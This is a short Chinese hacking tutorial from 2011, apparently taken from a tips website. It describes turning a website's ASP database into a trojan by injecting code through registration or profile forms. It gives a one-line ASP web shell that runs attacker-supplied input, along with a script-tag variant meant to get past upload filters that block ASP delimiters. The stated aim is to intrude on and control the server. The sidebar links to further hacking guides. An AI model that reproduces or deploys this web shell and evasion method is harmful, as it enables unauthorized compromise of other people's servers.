插入ASP代码让网站数据库成木马
发布时间:2011-06-26 04:27:28作者:知识屋
很多时候我们可以通过在注册表单或者用户信息修改表单中,插入简短的ASP代码,使网站ASP数据库变成为一个ASP木马,然后进一步入侵控制服务器。
不过在上传代码过程中,许多网页程序都不允许包含〈%%〉标记符号的内容的文件上传。
这样就有好多SHELL不能上传上去了。可以采用下面的方法解决。以蓝屏最小ASP木马为例。
首先:原程序代码是:
〈%execute request("l")%〉
我们可以把它的标签换下来。
然后改成:
〈scriptlanguage=VBScript runat=server〉execute request("l")〈/Script〉
这样就避开了使用〈%%〉,保存为.ASP,程序同样执行。
(免责声明:文章内容如涉及作品内容、版权和其它问题,请及时与我们联系,我们将在第一时间删除内容,文章内容仅供参考)
知识阅读
软件推荐
更多 >
-
1
教你把书上的字快速弄到电脑上2011-07-02
-
2
黑客基础教程之如何查看论坛隐藏贴(怎么查看论坛隐藏贴)
-
3
一个黑客所需的基本技能
-
4
黑客基础教程之如何查看电脑配置(怎么查看自己的电脑配置)
-
5
怎么取消开机密码
-
6
什么是肉鸡,如何避免电脑成为肉鸡?
-
7
一名初级黑客所必须掌握的基本技能
-
8
电脑常见安全隐患,你知道吗?
-
9
黑客基础教程之黑客入侵渗透教程
-
10
【注意】QQ密码本地破解的原理和方法
